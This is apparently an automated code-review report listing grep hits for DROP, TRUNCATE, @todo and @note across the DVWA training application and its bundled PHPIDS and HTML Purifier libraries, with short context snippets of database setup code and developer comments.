./external/phpids/0.6/lib/IDS/Caching/Database.php:44 (2/7) OK | Dubious | Bad | Hide 
41-
42-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
44:    DROP TABLE IF EXISTS `cache`;
45-
46-    #now select the created datbase and create the table
47-
./external/phpids/0.6/lib/IDS/Log/Database.php:41 (3/7) OK | Dubious | Bad | Hide 
38- *
39-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
40-        SET utf8 COLLATE utf8_general_ci;
41:    DROP TABLE IF EXISTS `intrusions`;
42-    CREATE TABLE IF NOT EXISTS `intrusions` (
43-      `id` int(11) unsigned NOT null auto_increment,
44-      `name` varchar(128) NOT null,
./dvwa/includes/DBMS/PGSQL.php:16 (4/7) OK | Dubious | Bad | Hide 
13-}
14-
15-// Create database
16:$drop_db = "DROP DATABASE IF EXISTS dvwa;";
17-
18-if( !@pg_query($drop_db) ) {
19-	dvwaMessagePush( "Could not drop existing database<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:39 (5/7) OK | Dubious | Bad | Hide 
36-	
37-// Create table 'users'
38-
39:$drop_table = "DROP TABLE IF EXISTS users;";
40-
41-if( !pg_query($drop_table) ) {
42-	dvwaMessagePush( "Could not drop existing users table<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:75 (6/7) OK | Dubious | Bad | Hide 
72-
73-// Create guestbook table
74-
75:$drop_table = "DROP table IF EXISTS guestbook;";
76-
77-if( !@pg_query($drop_table) ) {
78-	dvwaMessagePush( "Could not drop existing users table<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/MySQL.php:15 (7/7) OK | Dubious | Bad | Hide 
12-}
13-
14-// Create database
15:$drop_db = "DROP DATABASE IF EXISTS dvwa;";
16-if( !@mysql_query ( $drop_db ) ) {
17-	dvwaMessagePush( "Could not drop existing database<br />SQL: ".mysql_error() );
18-	dvwaPageReload();

TRUNCATE (1) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Database.php:248 (1/1) OK | Dubious | Bad | Hide 
246-        
247-        try {
248:            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251-                INSERT INTO `' .

@todo (33) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:38 (1/33) OK | Dubious | Bad | Hide 
36-    /**
37-     * Removes inline <style> tags from HTML, saves them for later use
38:     * @todo Extend to indicate non-text/css style blocks
39-     */
40-    public function preFilter($html, $config, $context) {
41-        $tidy = $config->get('FilterParam', 'ExtractStyleBlocksTidyImpl');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Composite.php:17 (2/33) OK | Dubious | Bad | Hide 
14-    
15-    /**
16-     * List of HTMLPurifier_AttrDef objects that may process strings
17:     * @todo Make protected
18-     */
19-    public $defs;
20-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Multiple.php:19 (3/33) OK | Dubious | Bad | Hide 
16-    
17-    /**
18-     * Instance of component definition to defer validation to.
19:     * @todo Make protected
20-     */
21-    public $single;
22-    
23-    /**
24-     * Max number of values allowed.
25:     * @todo Make protected
26-     */
27-    public $max;
28-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/FontFamily.php:5 (4/33) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates a font family list according to CSS spec
5: * @todo whitelisting allowed fonts would be nice
6- */
7-class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Enum.php:15 (5/33) OK | Dubious | Bad | Hide 
12-    
13-    /**
14-     * Lookup table of valid values.
15:     * @todo Make protected
16-     */
17-    public $valid_values   = array();
18-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TokenFactory.php:12 (6/33) OK | Dubious | Bad | Hide 
9- *       Other then that, there's not much point as we don't
10- *       maintain parallel HTMLPurifier_Token hierarchies (the main reason why
11- *       you'd want to use an abstract factory).
12: * @todo Port DirectLex to use this
13- */
14-class HTMLPurifier_TokenFactory
15-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:28 (7/33) OK | Dubious | Bad | Hide 
25- * @note Whether or not unrecognized children are silently dropped or
26- *       translated into text depends on the child definitions.
27- * 
28: * @todo Enable nodes to be bubbled out of the structure.
29- */
30-
31-class HTMLPurifier_Strategy_FixNesting extends HTMLPurifier_Strategy
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:68 (8/33) OK | Dubious | Bad | Hide 
65-    /**
66-     * Generates the file path to the serial file corresponding to
67-     * the configuration and definition name
68:     * @todo Make protected
69-     */
70-    public function generateFilePath($config) {
71-        $key = $this->generateKey($config);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:78 (9/33) OK | Dubious | Bad | Hide 
75-    /**
76-     * Generates the path to the directory contain this cache's serial files
77-     * @note No trailing slash
78:     * @todo Make protected
79-     */
80-    public function generateDirectoryPath($config) {
81-        $base = $this->generateBaseDirectoryPath($config);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:88 (10/33) OK | Dubious | Bad | Hide 
85-    /**
86-     * Generates path to base directory that contains all definition type
87-     * serials
88:     * @todo Make protected
89-     */
90-    public function generateBaseDirectoryPath($config) {
91-        $base = $config->get('Cache', 'SerializerPath');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:385 (11/33) OK | Dubious | Bad | Hide 
382-     *      it is different, and you'll probably have to modify your lists
383-     * @param $list String list to parse
384-     * @param array($allowed_elements, $allowed_attributes)
385:     * @todo Give this its own class, probably static interface
386-     */
387-    public function parseTinyMCEAllowedList($list) {
388-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:6 (12/33) OK | Dubious | Bad | Hide 
3-/**
4- * Abstract class representing Definition cache managers that implements
5- * useful common methods and is a factory.
6: * @todo Create a separate maintenance file advanced users can use to
7- *       cache their custom HTMLDefinition, which can be loaded
8- *       via a configuration directive
9: * @todo Implement memcached
10- */
11-abstract class HTMLPurifier_DefinitionCache
12-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/DirectLex.php:11 (13/33) OK | Dubious | Bad | Hide 
8- * it can be four times faster than HTMLPurifier_Lexer_PEARSax3, although it
9- * pales in comparison to HTMLPurifier_Lexer_DOMLex.
10- * 
11: * @todo Reread XML spec and document differences.
12- */
13-class HTMLPurifier_Lexer_DirectLex extends HTMLPurifier_Lexer
14-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PEARSax3.php:17 (14/33) OK | Dubious | Bad | Hide 
14- * don't use it. The unit tests do perform the tests on the SAX parser too, but
15- * whatever it does for poorly formed HTML is up to it.
16- * 
17: * @todo Generalize so that XML_HTMLSax is also supported.
18- * 
19- * @warning Entity-resolution inside attributes is broken.
20- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector/AutoParagraph.php:6 (15/33) OK | Dubious | Bad | Hide 
3-/**
4- * Injector that auto paragraphs text in the root node based on
5- * double-spacing.
6: * @todo Ensure all states are unit tested, including variations as well.
7: * @todo Make a graph of the flow control for this Injector.
8- */
9-class HTMLPurifier_Injector_AutoParagraph extends HTMLPurifier_Injector
10-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:250 (16/33) OK | Dubious | Bad | Hide 
247-    /**
248-     * Takes a piece of HTML and normalizes it by converting entities, fixing
249-     * encoding, extracting bits, and other good stuff.
250:     * @todo Consider making protected
251-     */
252-    public function normalize($html, $config, $context) {
253-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:284 (17/33) OK | Dubious | Bad | Hide 
281-    
282-    /**
283-     * Takes a string of HTML (fragment or document) and returns the content
284:     * @todo Consider making protected
285-     */
286-    public function extractBody($html) {
287-        $matches = array();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:4 (18/33) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * @todo Unit test
5- */
6-class HTMLPurifier_ContentSets
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:6 (19/33) OK | Dubious | Bad | Hide 
3-/**
4- * Abstract class for a set of proprietary modules that clean up (tidy)
5- * poorly written HTML.
6: * @todo Figure out how to protect some of these methods/properties
7- */
8-class HTMLPurifier_HTMLModule_Tidy extends HTMLPurifier_HTMLModule
9-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:35 (20/33) OK | Dubious | Bad | Hide 
32-    /**
33-     * Lazy load constructs the module by determining the necessary
34-     * fixes to create and then delegating to the populate() function.
35:     * @todo Wildcard matching and error reporting when an added or
36-     *       subtracted fix has no effect.
37-     */
38-    public function setup($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/CSSDefinition.php:266 (21/33) OK | Dubious | Bad | Hide 
263-    /**
264-     * Performs extra config-based processing. Based off of
265-     * HTMLPurifier_HTMLDefinition.
266:     * @todo Refactor duplicate elements into common class (probably using
267-     *       composition, not inheritance).
268-     */
269-    protected function setupConfigStuff($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/mailto.php:8 (22/33) OK | Dubious | Bad | Hide 
5-
6-/**
7- * Validates mailto (for E-mail) according to RFC 2368
8: * @todo Validate the email address
9: * @todo Filter allowed query parameters
10- */
11-
12-class HTMLPurifier_URIScheme_mailto extends HTMLPurifier_URIScheme {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:15 (23/33) OK | Dubious | Bad | Hide 
12- *       otherwise, you run the risk of missing a parameter and then
13- *       being stumped when a configuration directive doesn't work.
14- * 
15: * @todo Reconsider some of the public member variables
16- */
17-class HTMLPurifier_Config
18-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:8 (24/33) OK | Dubious | Bad | Hide 
5- * caching and fallbacks.
6- * @note Thanks to MediaWiki for the general logic, although this version
7- *       has been entirely rewritten
8: * @todo Serialized cache for languages
9- */
10-class HTMLPurifier_LanguageFactory
11-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:15 (25/33) OK | Dubious | Bad | Hide 
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14- *       objects (include it anyway if that's the correspondence though).
15: * @todo Consider making some member functions protected
16- */
17-
18-class HTMLPurifier_HTMLModule
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:5 (26/33) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Generates HTML from tokens.
5: * @todo Refactor interface so that configuration/context is determined
6- *       upon instantiation, no need for messy generateFromTokens() calls
7: * @todo Make some of the more internal functions protected, and have
8- *       unit tests work around that
9- */
10-class HTMLPurifier_Generator
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:169 (27/33) OK | Dubious | Bad | Hide 
166-    
167-    /**
168-     * Escapes raw text data.
169:     * @todo This really ought to be protected, but until we have a facility
170-     *       for properly generating HTML here w/o using tokens, it stays
171-     *       public.
172-     * @param $string String data to escape for HTML.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector.php:13 (28/33) OK | Dubious | Bad | Hide 
10- * are best described HTMLPurifier_Strategy_MakeWellFormed->processToken()
11- * documentation.
12- * 
13: * @todo Allow injectors to request a re-run on their output. This 
14- *       would help if an operation is recursive.
15- */
16-abstract class HTMLPurifier_Injector
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:39 (29/33) OK | Dubious | Bad | Hide 
36-    
37-    /**
38-     * Has the language object been loaded yet?
39:     * @todo Make it private, fix usage in HTMLPurifier_LanguageTest
40-     */
41-    public $_loaded = false;
42-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:114 (30/33) OK | Dubious | Bad | Hide 
111-     * @param $key string identifier of message
112-     * @param $args Parameters to substitute in
113-     * @return string localised message
114:     * @todo Implement conditionals? Right now, some messages make
115-     *     reference to line numbers, but those aren't always available
116-     */
117-    public function formatMessage($key, $args = array()) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/HTMLDefinition.php:234 (31/33) OK | Dubious | Bad | Hide 
231-    /**
232-     * Listifies a list of objects by retrieving class names and internal state
233-     * @param $array List of objects
234:     * @todo Also add information about internal state
235-     */
236-    protected function listifyObjectList($array) {
237-        ksort($array);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/ConfigForm.php:4 (32/33) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * @todo Rewrite to use Interchange objects
5- */
6-class HTMLPurifier_Printer_ConfigForm extends HTMLPurifier_Printer
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:51 (33/33) OK | Dubious | Bad | Hide 
48- *       These configurations are entirely independent of each other and
49- *       are *not* merged (this behavior may change in the future).
50- * 
51: * @todo We need an easier way to inject strategies using the configuration
52- *       object.
53- */
54-class HTMLPurifier

@note (95) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigDef/Directive.php:5 (1/95) OK | Dubious | Bad | Hide 
3-/**
4- * Structure object containing definition of a directive.
5: * @note This structure does not contain default values
6- */
7-class HTMLPurifier_ConfigDef_Directive extends HTMLPurifier_ConfigDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:8 (2/95) OK | Dubious | Bad | Hide 
5- * using CSSTidy, and then places them in $purifier->context->get('StyleBlocks')
6- * so they can be used elsewhere in the document.
7- * 
8: * @note
9- *      See tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php for
10- *      sample usage.
11- * 
12: * @note
13- *      This filter can also be used on stylesheets not included in the
14- *      document--something purists would probably prefer. Just directly
15- *      call HTMLPurifier_Filter_ExtractStyleBlocks->cleanCSS()
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/Validator.php:6 (3/95) OK | Dubious | Bad | Hide 
3-/**
4- * Performs validations on HTMLPurifier_ConfigSchema_Interchange
5- *
6: * @note If you see '// handled by InterchangeBuilder', that means a
7- *       design decision in that class would prevent this validation from
8- *       ever being necessary. We have them anyway, however, for
9- *       redundancy.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/SafeParam.php:8 (4/95) OK | Dubious | Bad | Hide 
5- * will only allow name values it recognizes, and pre-fill certain attributes
6- * with required values.
7- * 
8: * @note
9- *      This class only supports Flash. In the future, Quicktime support
10- *      may be added.
11- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/Lang.php:5 (5/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Post-transform that copies lang's value to xml:lang (and vice-versa)
5: * @note Theoretically speaking, this could be a pre-transform, but putting
6- *       post is more efficient.
7- */
8-class HTMLPurifier_AttrTransform_Lang extends HTMLPurifier_AttrTransform
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter.php:18 (6/95) OK | Dubious | Bad | Hide 
15- * 2->preFilter, 3->preFilter, purify, 3->postFilter, 2->postFilter,
16- * 1->postFilter.
17- * 
18: * @note Methods are not declared abstract as it is perfectly legitimate
19- *       for an implementation not to want anything to happen on a step
20- */
21-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Token/Tag.php:19 (7/95) OK | Dubious | Bad | Hide 
16-    /**
17-     * The lower-case name of the tag, like 'a', 'b' or 'blockquote'.
18-     * 
19:     * @note Strictly speaking, XML tags are case sensitive, so we shouldn't
20-     * be lower-casing them, but these tokens cater to HTML tags, which are
21-     * insensitive.
22-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Filter.php:5 (8/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Microsoft's proprietary filter: CSS property
5: * @note Currently supports the alpha filter. In the future, this will
6- *       probably need an extensible framework
7- */
8-class HTMLPurifier_AttrDef_CSS_Filter extends HTMLPurifier_AttrDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Multiple.php:10 (9/95) OK | Dubious | Bad | Hide 
7- * lengths to be specified.  This class can take a vanilla border-width
8- * definition and multiply it, usually into a max of four.
9- * 
10: * @note Even though the CSS specification isn't clear about it, inherit
11- *       can only be used alone: it will never manifest as part of a multi
12- *       shorthand declaration.  Thus, this class does not allow inherit.
13- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Font.php:12 (10/95) OK | Dubious | Bad | Hide 
9-    /**
10-     * Local copy of component validators.
11-     * 
12:     * @note If we moved specific CSS property definitions to their own
13-     *       classes instead of having them be assembled at run time by
14-     *       CSSDefinition, this wouldn't be necessary.  We'd instantiate
15-     *       our own copies.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/TextDecoration.php:5 (11/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates the value for the CSS property text-decoration
5: * @note This class could be generalized into a version that acts sort of
6- *       like Enum except you can compound the allowed values.
7- */
8-class HTMLPurifier_AttrDef_CSS_TextDecoration extends HTMLPurifier_AttrDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/URI.php:5 (12/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates a URI in CSS syntax, which uses url('http://example.com')
5: * @note While theoretically speaking a URI in a CSS document could
6- *       be non-embedded, as of CSS2 there is no such usage so we're
7- *       generalizing it. This may need to be changed in the future.
8- * @warning Since HTMLPurifier_AttrDef_CSS blindly uses semicolons as
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Background.php:12 (13/95) OK | Dubious | Bad | Hide 
9-    
10-    /**
11-     * Local copy of component validators.
12:     * @note See HTMLPurifier_AttrDef_Font::$info for a similar impl.
13-     */
14-    protected $info;
15-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/ListStyle.php:12 (14/95) OK | Dubious | Bad | Hide 
9-    
10-    /**
11-     * Local copy of component validators.
12:     * @note See HTMLPurifier_AttrDef_CSS_Font::$info for a similar impl.
13-     */
14-    protected $info;
15-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI.php:5 (15/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates a URI as defined by RFC 3986.
5: * @note Scheme-specific mechanics deferred to HTMLPurifier_URIScheme
6- */
7-class HTMLPurifier_AttrDef_URI extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS.php:5 (16/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates the HTML attribute style, otherwise known as CSS.
5: * @note We don't implement the whole CSS specification, so it might be
6- *       difficult to reuse this component in the context of validating
7- *       actual stylesheet declarations.
8: * @note If we were really serious about validating the CSS, we would
9- *       tokenize the styles and then parse the tokens. Obviously, we
10- *       are not doing that. Doing that could seriously harm performance,
11- *       but would make these components a lot more viable for a CSS
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Enum.php:21 (17/95) OK | Dubious | Bad | Hide 
18-    
19-    /**
20-     * Bool indicating whether or not enumeration is case sensitive.
21:     * @note In general this is always case insensitive.
22-     */
23-    protected $case_sensitive = false; // values according to W3C spec
24-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/HTML/Nmtokens.php:5 (18/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates contents based on NMTOKENS attribute type.
5: * @note The only current use for this is the class attribute in HTML
6: * @note Could have some functionality factored out into Nmtoken class
7- * @warning We cannot assume this class will be used only for 'class'
8- *          attributes. Not sure how to hook in magic behavior, then.
9- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/HTML/LinkTypes.php:5 (19/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates a rel/rev link attribute against a directive of allowed values
5: * @note We cannot use Enum because link types allow multiple
6- *       values.
7: * @note Assumes link types are ASCII text
8- */
9-class HTMLPurifier_AttrDef_HTML_LinkTypes extends HTMLPurifier_AttrDef
10-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Lang.php:5 (20/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates the HTML attribute lang, effectively a language code.
5: * @note Built according to RFC 3066, which obsoleted RFC 1766
6- */
7-class HTMLPurifier_AttrDef_Lang extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Integer.php:5 (21/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Validates an integer.
5: * @note While this class was modeled off the CSS definition, no currently
6- *       allowed CSS uses this type.  The properties that do are: widows,
7- *       orphans, z-index, counter-increment, counter-reset.  Some of the
8- *       HTML attributes, however, find use for a non-negative version of this.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/IPv6.php:6 (22/95) OK | Dubious | Bad | Hide 
3-/**
4- * Validates an IPv6 address.
5- * @author Feyd @ forums.devnetwork.net (public domain)
6: * @note This function requires brackets to have been removed from address
7- *       in URI.
8- */
9-class HTMLPurifier_AttrDef_URI_IPv6 extends HTMLPurifier_AttrDef_URI_IPv4
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TokenFactory.php:6 (23/95) OK | Dubious | Bad | Hide 
3-/**
4- * Factory for token generation.
5- * 
6: * @note Doing some benchmarking indicates that the new operator is much
7- *       slower than the clone operator (even discounting the cost of the
8- *       constructor).  This class is for that optimization.
9- *       Other then that, there's not much point as we don't
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:5 (24/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * HTML Purifier's internal representation of a URI.
5: * @note
6- *      Internal data-structures are completely escaped. If the data needs
7- *      to be used in a non-URI context (which is very unlikely), be sure
8- *      to decode it first. The URI may not necessarily be well-formed until
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:17 (25/95) OK | Dubious | Bad | Hide 
14-    public $scheme, $userinfo, $host, $port, $path, $query, $fragment;
15-    
16-    /**
17:     * @note Automatically normalizes scheme and port
18-     */
19-    public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment) {
20-        $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:25 (26/95) OK | Dubious | Bad | Hide 
22- * task is pervasive through the strategy, though the two are distinct tasks
23- * and could, theoretically, be seperated (although it's not recommended).
24- * 
25: * @note Whether or not unrecognized children are silently dropped or
26- *       translated into text depends on the child definitions.
27- * 
28- * @todo Enable nodes to be bubbled out of the structure.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Context.php:7 (27/95) OK | Dubious | Bad | Hide 
4- * Registry object that contains information about the current context.
5- * @warning Is a bit buggy when variables are set to null: it thinks
6- *          they don't exist! So use false instead, please.
7: * @note Since the variables Context deals with may not be objects,
8- *       references are very important here! Do not remove!
9- */
10-class HTMLPurifier_Context
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/UnitConverter.php:66 (28/95) OK | Dubious | Bad | Hide 
63-     *      it before passing it here!
64-     * @param string $to_unit
65-     *      Unit to convert to.
66:     * @note
67-     *      About precision: This conversion function pays very special
68-     *      attention to the incoming precision of values and attempts
69-     *      to maintain a number of significant figure. Results are
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:18 (29/95) OK | Dubious | Bad | Hide 
15-    
16-    /**
17-     * Registers a doctype to the registry
18:     * @note Accepts a fully-formed doctype object, or the
19-     *       parameters for constructing a doctype object
20-     * @param $doctype Name of doctype or literal doctype object
21-     * @param $modules Modules doctype will load
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:51 (30/95) OK | Dubious | Bad | Hide 
48-    
49-    /**
50-     * Retrieves reference to a doctype of a certain name
51:     * @note This function resolves aliases
52:     * @note When possible, use the more fully-featured make()
53-     * @param $doctype Name of doctype
54-     * @return Editable doctype object
55-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:69 (31/95) OK | Dubious | Bad | Hide 
66-    /**
67-     * Creates a doctype based on a configuration object,
68-     * will perform initialization on the doctype
69:     * @note Use this function to get a copy of doctype that config
70-     *       can hold on to (this is necessary in order to tell
71-     *       Generator whether or not the current document is XML
72-     *       based or not).
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:77 (32/95) OK | Dubious | Bad | Hide 
74-    
75-    /**
76-     * Generates the path to the directory contain this cache's serial files
77:     * @note No trailing slash
78-     * @todo Make protected
79-     */
80-    public function generateDirectoryPath($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:20 (33/95) OK | Dubious | Bad | Hide 
17- * Purifier internals. Many of them, however, are public, and may be
18- * edited by userspace code to tweak the behavior of HTMLDefinition.
19- * 
20: * @note This class is inspected by Printer_HTMLDefinition; please
21- *       update that class if things here change.
22- *
23- * @warning Directives that change this object's structure must be in
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:54 (34/95) OK | Dubious | Bad | Hide 
51-    
52-    /**
53-     * String name of element used to wrap inline elements in block context
54:     * @note This is rarely used except for BLOCKQUOTEs in strict mode
55-     */
56-    public $info_block_wrapper = 'p';
57-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:95 (35/95) OK | Dubious | Bad | Hide 
92-    
93-    /**
94-     * Adds a custom attribute to a pre-existing element
95:     * @note This is strictly convenience, and does not have a corresponding
96-     *       method in HTMLPurifier_HTMLModule
97-     * @param $element_name String element name to add attribute to
98-     * @param $attr_name String name of attribute
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:114 (36/95) OK | Dubious | Bad | Hide 
111-    
112-    /**
113-     * Adds a custom element to your HTML definition
114:     * @note See HTMLPurifier_HTMLModule::addElement for detailed 
115-     *       parameter and return value descriptions.
116-     */
117-    public function addElement($element_name, $type, $contents, $attr_collections, $attributes) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:128 (37/95) OK | Dubious | Bad | Hide 
125-    /**
126-     * Adds a blank element to your HTML definition, for overriding
127-     * existing behavior
128:     * @note See HTMLPurifier_HTMLModule::addBlankElement for detailed
129-     *       parameter and return value descriptions.
130-     */
131-    public function addBlankElement($element_name) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:27 (38/95) OK | Dubious | Bad | Hide 
24- * Bootstrap class that contains meta-functionality for HTML Purifier such as
25- * the autoload function.
26- *
27: * @note
28- *      This class may be used without any other files from HTML Purifier.
29- */
30-class HTMLPurifier_Bootstrap
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:56 (39/95) OK | Dubious | Bad | Hide 
53-    
54-    /**
55-     * Checks if a definition's type jives with the cache's type
56:     * @note Throws an error on failure
57-     * @param $def Definition object to check
58-     * @return Boolean true if good, false if not
59-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:100 (40/95) OK | Dubious | Bad | Hide 
97-    
98-    /**
99-     * Clears all expired (older version or revision) objects from cache
100:     * @note Be carefuly implementing this method as flush. Flush must
101-     *       not interfere with other Definition types, and cleanup()
102-     *       should not be repeatedly called by userland code.
103-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/DOMLex.php:12 (41/95) OK | Dubious | Bad | Hide 
9- * documents, it performs twenty times faster than
10- * HTMLPurifier_Lexer_DirectLex,and is the default choice for PHP 5. 
11- * 
12: * @note Any empty elements will have empty tokens associated with them, even if
13- * this is prohibited by the spec. This is cannot be fixed until the spec
14- * comes into play.
15- * 
16: * @note PHP's DOM extension does not actually parse any entities, we use
17- *       our own function to do that.
18- * 
19- * @warning DOM tends to drop whitespace, which may wreak havoc on indenting.
